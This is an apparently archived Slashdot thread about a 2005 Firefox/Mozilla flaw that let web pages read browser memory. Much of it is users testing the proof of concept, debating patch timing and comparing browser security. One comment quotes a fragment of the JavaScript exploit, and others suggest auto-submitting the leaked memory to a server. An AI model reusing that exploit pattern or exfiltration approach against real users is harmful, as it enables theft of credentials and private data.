Mozilla / Firefox Memory Exposure Vulnerability 132
JimmyM writes "Secunia has a story regarding a new severe vulnerability in the Mozilla Suite and Firefox browser, which can be exploited by any web site to read all memory, which the browser process has access to. No patch is available from Mozilla. A demonstration is available here."
Did the Mozilla/Firefox guys ignore a warning? (Score:4, Insightful)
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:3, Interesting)
Just tested out the "proof test" myself. Amazing some of the stuff I still had in memory here
Followed by the browser shutting itself down after about 20 furious clicks on the link!
IE & Opera Unaffected (Score:5, Interesting)
Clearly a Mozilla-specific problem.
Re:IE & Opera Unaffected (Score:3, Funny)
"Mozilla / Firefox / IE / Opera Memory Exposure Vulnerability"
wouldn't it?
Re:IE & Opera Unaffected (Score:2)
Problem?
Re:IE & Opera Unaffected (Score:5, Insightful)
Re:IE & Opera Unaffected (Score:2)
I'm just getting Xs even after hammering on the link for a bit.
Browser is Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050404 Firefox/1.0 (Ubuntu package 1.0.2)
I guess that even since this is version 1.0.2 that someone in Debian or Ubuntu backported the fix and it was available in my last update.
Re:IE & Opera Unaffected (Score:2)
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:3, Informative)
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:5, Informative)
Opened: 2005-04-01 13:40 PDT
Last modified: 2005-04-01 22:39 PDT
Resolution: FIXED
So yes they did, it was fixed in under 10 hours, and published 3 days later.
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:5, Interesting)
------- Additional Comment #6 From Brendan Eich 2005-04-01 17:49 PDT [reply] -------
BTW, this bug is like 8+ years old. Roger Lawrence fixed half of it in 2000:
r=norris,waldemar
Fixes for bugs#23607, 23608, 23610, 23612, 23613. Also, first cut at URI
encode & decode routines.
Unfortunately, AFAICT none of the bugs he cites had anything to do with the two
hunks of that revision:
@@ -1061,16 +1080,22 @@ find_replen(JSContext *cx, ReplaceData *
@@ -1138,16 +1163,17 @@ find_replen(JSContext *cx, ReplaceData *
that half-fixed the original 1997-era bug.
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:2)
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:2)
"did this site publish the vulnerability without giving them a chance to patch?"
But that's wrong too. I meant to say that yes they did inform the Moz devs of this before going public.
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:2)
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:3, Informative)
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:3, Informative)
Or just drag the link over the tab bar. Over an empty space (or the close button if it's full) to create a new tab, or over an existing tab to load the link there.
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:2)
Confusing write-up (Score:4, Interesting)
Re:Confusing write-up (Score:2)
Re:Confusing write-up (Score:5, Informative)
The data is being displayed within a TEXTAREA box, so it's probably as simple as adding an onClick="javascript:document.form.submit();" (or onMouseOver, etc.) to the document.
Yes, this is very dangerous.
Ok, confirmed (Score:5, Informative)
Re:Confusing write-up (Score:1)
Re:Confusing write-up (Score:3, Informative)
Re:Confusing write-up (Score:3, Interesting)
Also from the article:
"A vulnerability has been discovered in various Mozilla products, which can be exploited by malicious people to gain knowledge of potentially sensitive information."
So yeah, this is a bit more dangerous than the old load the root folder in an ifr
Re:Confusing write-up (Score:4, Interesting)
I don't think this is necessarily a huge problem - it's a critical bug, but until we see some major code execution or phishing, it probably won't be as big of a deal as it could be.
The question is, can they find out how big of a memory chunk they can read before they start reading? If so, they could grab god knows how many megs and start uploading it somewhere (somehow - that's too big for a GET query) and just dump it, but if they read too much and try to read what Firefox can't access, it should (emphasis 'should') get killed by Windows instead of failing silently.
I'm shocked! (Score:5, Interesting)
But now it seems there are patches for Mozilla every few weeks for _exactly_ the same kind of problems that IE used to get slated for.
Is Mozilla actually more secure? Or is it just as bad as any other piece of software?
Re:I'm shocked! (Score:2)
Re:I'm shocked! (Score:1)
Re:I'm shocked! (Score:3, Informative)
Well unlike MSIE this is a bug rather than a feature(ActiveX) and all software has bugs but aparently it is patched so will be rolled out soon.
Getting details on this is not the easyes but aco
Re:I'm shocked! (Score:1)
Re:Mod parent something else .. (Score:2)
(I do not care about the karma , my karma is maxed out and this wont hurt it any)
FCat
Re:I'm shocked! (Score:3)
So the original assertion is still, at least partly true: The software underneath the apps is more secure.
Re:I'm shocked! (Score:3, Insightful)
Of course, I can reinstall the OS in about two hours.
It's my documents I actually care about...
Re:I'm shocked! (Score:2)
Re:I'm shocked! (Score:2)
Two hours when you have a deadline is a lot of money.
Two hours in the workplace would not be acceptable.
Plus, you would need to know your system has been compromised in the first place, and then reinstall the same unsecure software.
With mozilla, you could wait 8 more hours, and install a patched version of your software.
Re:I'm shocked! (Score:2)
To be fair, a good bug in Mozilla can take your X server down, or at least make it so unresponsive that you can't do anything. Or it could kill your window manager, probably logging you out. And if things do get really stuck, you may have to log in from another system (or hit the vulcan nerve pinch keys -- either kill X, get to a VC and maybe C-A-D.)
Not quite as bad as ta
Re:I'm shocked! (Score:2, Insightful)
Re:I'm shocked! (Score:2)
And if it's younger then it's had less time to have horrible crustiness develop.
Either way round isn't an excuse.
Re:I'm shocked! (Score:2)
Re:I'm shocked! (Score:2)
Re:I'm shocked! (Score:3, Insightful)
And Linux is at version 2.6.something, and Windows is at version 2003 and Solaris is at version 10 (having jumped from 2.6 to 7.) Fedora Core is at FC3 (or is that RH12?) Doom is up to Doom 3, and Jake 2.0 was released at 2.0 and never made 2.1. And I think Sid died at version 6.7. Relevance?
Version numbers don't mean anything. They're arbitrary, and you cannot compare them to the numbers of other products l
Re:I'm shocked! (Score:2)
Re:I'm shocked! (Score:1, Insightful)
No, he was mocking someone else who did:
Mozilla is at version 1.7.5 and Firefox is at version 1.x. IE is approaching version 7.0.
Re:I'm shocked! (Score:2)
Re:I'm shocked! (Score:2)
Re:I'm shocked! (Score:2)
Here's the definition of quantitive http://dictionary.reference.com/search?q=quantiti
I hope this doesn't exceed your fourth grade reading level.
Re:I'm shocked! (Score:4, Informative)
It's a commonly held belief that Microsoft programmers come from Elbonia. Once it is accepted that Mozilla programmers are just as Elbonian as MS Programmers, the security zealousy will die down.
(Disclaimer 1: This post does not say that Mozilla is less secure (or more secure, for that matter) than IE. This post does not say that Mozilla programmers are incompetent. This post does address zealotry and nothing else.)
(Disclaimer 2: It really fucking pisses me off that I have to write this stupid disclaimer because lots of people with mod-points will not accept anything that's even remotely negative about Mozilla. Learn how to take criticism before dispensing it.)
Re:I'm shocked! (Score:2)
Re:I'm shocked! (Score:2)
MS feature list comes from marketing dept. Its release deadlines, from marketing dept + the reality. If reality-based delays don't meet marketing expectations, we don't know what they do.
Mozilla developers can be put to test, because we can read their code, there is even people who do read their code. If you got any conclusions on the mozilla developers skill, you couldn't extrapolate them to MS developers, because y
Re:I'm shocked! (Score:2)
And Open Source programmers come from the good programmers cabbage patch or something?
" there is even people who do read their code."
If they feel like it. Sadly, errors and half-assed functionality still get through.
"Mozilla feature list comes from user feedback + whatever the maintainers feel is sensible to add."
Whatever they feel like adding. (Or, more appropriately, copying from another app.)
"So, what I mean is that there can be other reasons than
Re:I'm shocked! (Score:2)
I believe you are not quoting right.
The OP stated that there is some amount of error inherent to software development, and that MS developers were supposed to be assumed to have the same quality as mozilla developers.
What I meant is that mozilla developers produce code of a much more measurable (for the general public) quality, and that fact for itself is important.
What I exactly meant is that it does matter what you are using, because you can make an more informed decision about whether yo
Re:I'm shocked! (Score:2)
Actually, from the end-user point of view, Opera's probably the best one out there. Depends on how you view it, though.
"What I meant is that mozilla developers produce code of a much more measurable (for the general public) quality, and that fact for itself is important."
I'm not sure I agree with that, but I don't think I can strongly dispute it either. Frankly, I'm not impressed with OSS software. I mean, some of it I am. A lot of it, I'm not. My idea of quality is that featur
Re:I'm shocked! (Score:2)
Opera, I used to like.
Now I don't use windows anymore, and I choose not to use non-free software, for ethical rather than technical reasons. That doesn't mean I don't care about features. I even run some non-free software when I just need to, to get my work done.
What happens to me with Opera is that it was great, tabs were really great. Now Firefox is just smoother to me. I am a usability freak, too. It just happens that Firefox doesn't have usability issues that interfere with _my_ habits. I lik
Re:I'm shocked! (Score:2)
To each is own. Me personally, I enjoy all the little things they did to make browsing easier. Magnifying glass, 'paste and go' in the address bar, the notes panel, the mail client that is brilliant for handling forum email, etc. Whenever I use FireFox, I end up looking for buttons that aren't there.
"When you talk about innovat
Re:I'm shocked! (Score:5, Interesting)
In terms of design decisions, you might easily say that Mozilla is more secure than IE. (not being integrated with OS and all..) In terms of coding bugs, Mozilla is no different than any other super complex piece of software. But there's another way to look at it. Because the Mozilla code is open, we might expect an ugly rash of bugs to be found near the beginning of its rise to popularity. But we might also expect this to rapidly taper off as all the major bugs are found and squashed. So you might say that now is a relatively dangerous time to use Mozilla (instead of say.. Konqueror or Safari). But, on the other hand, it's still not quite popular enough to attract the volume of real-world attacks that IE has received. Honestly, if you're some jerk running a malicious website, are you going to target this quirky bug in Mozilla or the myriad of IE exploits that are sure to pay off?
What does bother me is that the Mozilla folks haven't taken automated updates seriously enough. I cringe to think of how many Firefox early adopters have no clue what that little red arrow at the top of their screen is. Or if they do, how many dial-up users will be patient enough to wait for the update to download.. which isn't really an update at all but a full copy of the latest version.
Re:I'm shocked! (Score:2)
If mozilla has some critic bug, you can always disable mozilla and use konqueror until mozilla releases a fix. That would be a day or two without mozilla.
In an IE-scenario, you would not be able to disable IE, plus there's no reasonable amount of time after which you can expect a bug will be fixed.
Noone is talking about bug-free software. Bug-free software is just not worth it, it would take too muuch time and money to be useful.
The thing with IE is
No shock at all (Score:2)
If you can't or don't want to do an audit of the source, it's usually safe to assume it's probably just as bad as whatever software the Mozilla programmers used to write.
A good tree produces good fruit. A bad tree produces bad fruit. Sure you can get a tree to change, but it often takes years (see BIND, Sendmail).
The fact that Mozilla crashes regularly (but not so predictably) on normal use (well at least my normal use
oh man (Score:2, Funny)
Interesting (Score:1)
Re:Interesting (Score:1)
Re:Interesting (Score:1)
Re:Interesting (Score:2)
They say that open source... (Score:1, Insightful)
Re:They say that open source... (Score:2)
Re:They say that open source... (Score:2)
Here's a link [mozilla.org]
Re:They say that open source... (Score:1)
Re:They say that open source... (Score:2)
Considering this whole is already fixed, it's hard to ask for faster than that!
On the other hand...
So I'm wondering, just how long will the Mozilla foundation take to distribute a fix for this
That's another question altogether, and one that isn't done so well with Firefox. Still far better than with IE (where you see actively exploited vulnerabilities listed on MS's IE page that aren't fixed for months!). This is something the Mozilla folks
It looks like it requires Javascript (Score:3, Interesting)
Once again demonstrating the danger in the current mindset of "I will use Javascript to do everything, even things that can be done with plain HTML like opening a new window".
I have my Mozilla configured to ask me if I want it to fetch Javascript from remote sites (alas, you cannot protect yourself from Javascript embedded in the HTML of the site you are visiting), to ask me if I want to run any requested plugins, and to ask be before allowing any cookies to be set on my browser.
If you can, try this yourself - you will be AMAZED at the number of sites that insist upon setting a cooking on you the first thing when you visit them, or that insist upon trying to load Javascript, or Flash plugins.
Cookies are fine for sites which require log-in (e.g.
But please don't over use them.
Re:It looks like it requires Javascript (Score:3, Informative)
Re:Just a clarification (Score:2)
Re:It looks like it requires Javascript (Score:2)
I have yet to see a web application in Flash that couldn't be implemented in plain HTML with maybe a touch of server-side scripting. So-called Flash "movies" don't count, because those could simply be saved to disk via web browser without involving a plugin, and then could be played back without any online component at all.
Of greatest annoyance are websites with Flash intros lacking a way to get past the intro, or with Flash navigation instead of a simple imagemap. N
Re:It looks like it requires Javascript (Score:2)
Opening a new window has been depricated in XHTML - the only way to do it is JavaShit. Which is good because I hate webmasters assuming I want links opened in a new window (I almost never do - if I did I would've clicked "open in new window"). Unfortunately it's bad coz they'll just use Javascript instead.
Definately a big hole (Score:5, Insightful)
If this could be automated (and it easily could be with something like XML-RPC), imagine the possibilities for phishing. Visit a page, have your credit card number disclosed.
Time for Firefox 1.03.
Re:Definately a big hole (Score:2)
And you were dumb enough to assume that I didn't check the source code before clicking the button. No data is transmitted with this example.
Of course, other websites may not be so forgiving.
Simple JavaScript (Score:2, Insightful)
It's almost scary... the JavaScript for this looks to just abuse a buffer overflow in an almost scary-easy way.
function genGluck(str){
var x = str;
var rx=/end/i;
x = x.replace(rx,function($1){
$1.match(rx);
return "";
});
x = x.replace(/^end/,"");
return x;
}
function readMemory()
{
var mem = genGluck("{10,246 "X's" here}end");
mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g,
No problem here (Score:2, Informative)
using OSX with nightly builds auto-downloaded with FireFix [macupdate.com] (which is a really neat app)
Re:No problem here (Score:3, Funny)
Safari slightly vulnerable? (Score:3, Insightful)
Re:Safari slightly vulnerable? (Score:3, Insightful)
Download the latest patched version right here (Score:3, Informative)
I just used it and I am not vulnerable: all I see are lot's of X's just like in IE.
Access to firefox heap, not entire system (Score:3, Insightful)
This data is available to the javascript engine then, so it is possible for the javascript to submit it a number of ways to an internet server. It could call a web service with the data or post it to a web page. The server could then organize this data and examine it for anything interesting.
This will not allow someone to read your personal files or hijack your computer. The real problem would be if stored passwords or sensitive data from web mail or banking sites were on the heap and were found this way and transmitted to a web site. A large amount of 'Junk' would have to be sifted through in order to get any juicy data though.
The only way to be save right now is (in FireFox) to go to Tools->Options, go to "Web Features", and uncheck "Enable Javascript". Seeing as many sites (including /.) require javascript to use, this really isn't a good option. I hope the team gets a fixed version out soon.
Re:Access to firefox heap, not entire system (Score:1, Informative)
Seeing as many sites (including /.) require javascript to use, this really isn't a good option.
This is bullshit. Lots of sites use Javascript, but very few sites require Javascript. Slashdot is one example of a website that uses Javascript without requiring it.
So ignore the parent, go ahead and switch Javascript off. If you find a website that is broken, email a complaint, and, if you trust the website, enable Javascipt for that one website, and switch it off again afterwards.
As far as I can te
Re:Access to firefox heap, not entire system (Score:2)
I'd LOVE to have that. there are only a handful of sites that I use that NEED js. most don't. and in some sites, its BAD to have js on (ie, I get more ads with js t
Re:Access to firefox heap, not entire system (Score:2)
Certainly I have been able to guess the URL by looking at one-line samples of Javascript. Is this possible in general? Would it be good enough to allow you to leave javascript off?
Re:Access to firefox heap, not entire system (Score:2)
Re:Access to firefox heap, not entire system (Score:3, Informative)
since when?
I disable js for all but 1 or 2 sites that I visit.
prefbar (mozilla/firefox) allows a single click to turn on/off jscript. get it and use it.
but you don't need js for slash. you never have.
comma (Score:5, Insightful)
I don't normally complain about the grammar and punctuation of submitters and editors, but in this case it is too significant. The difference between
and
Is profound. The first form says that the browser has access to all memory. The second form says that the web site has access to all the memory to which the browser also has access. Catching and fixing stuff like this is what an editor does. If Slashdot's people can't do that, then don't call them editors. Call them "Dudes Who Click Approve," or something like that.
Re:comma (Score:2)
The only way to pacify MS Word, if you insist upon using "which", is to put the comma before it.
Of course, this is all to say nothing of ending the sentence with a preposition, but that hardly has the impact noted by the parent
Re:comma (Score:1)
Coupon: "No money down!"
Hutz: "What? This thing is all screwed up"
[hutz writes on it]
Coupon now reads: "No. [M]oney down!"
doesn't show anything but XXXXs for me (Score:2)
Re:doesn't show anything but XXXXs for me (Score:2)
Browser string is Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050404 Firefox/1.0 (Ubuntu package 1.0.2), the 4/4/05 makes me think a fix was backported for us. Gives me a little more happiness about Ubuntu and Debian, though I'm sure it has made its way into other distributions as well.
CRASH? (Score:1)
Re:CRASH? (Score:3, Interesting)
Windows 98 SE, Firefox 1.0.2.
Re:CRASH? (Score:1)
Re:CRASH? (Score:2)
Javascript does not have the Java security model.
Java does suck, but for other reasons...
Firefox's autoupdate feature needs serious work. (Score:2)
If they haven't even put 1.0.2 onto the autoupdater, how long will it be before patches like this make it out? It's pretty stupid.
Re:Firefox's autoupdate feature needs serious work (Score:2)
Other Gecko-based browsers affected as well. (Score:3, Insightful)
Re:What? (Score:1)
Same here. I click the link, Firefox crashes. What gives?
Re:What? (Score:1)
Wait, maybe it's not Firefox. Never mind!
rsmith@pingdata.net